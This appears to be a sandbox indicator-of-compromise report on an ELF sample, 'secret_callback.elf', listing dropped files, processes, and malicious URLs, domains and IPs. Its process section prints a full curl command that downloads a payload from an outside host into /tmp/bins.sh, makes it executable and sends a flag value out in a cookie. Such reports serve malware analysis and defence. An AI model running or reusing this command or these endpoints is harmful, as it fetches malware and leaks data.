IOC Report
secret_callback.elf

loading gif

Files

File Path
Type
Category
Malicious
secret_callback.elf
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, no section header
initial sample
 malicious
/tmp/bins.sh
HTML document, ASCII text, with CRLF line terminators
dropped

Processes

Path
Cmdline
Malicious
/tmp/secret_callback.elf
/tmp/secret_callback.elf
/bin/sh
/bin/sh -c "curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b 'result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D' -o /tmp/bins.sh 2>/dev/null && chmod +x /tmp/bins.sh"
/bin/sh
-
/usr/bin/curl
curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D -o /tmp/bins.sh

URLs

Name
IP
Malicious
http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu
94.26.90.14

Domains

Name
IP
Malicious
conn.masjesu.zip
163.5.159.12

IPs

IP
Domain
Country
Malicious
94.26.90.14
unknown
Bulgaria
163.5.159.12
conn.masjesu.zip
France
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom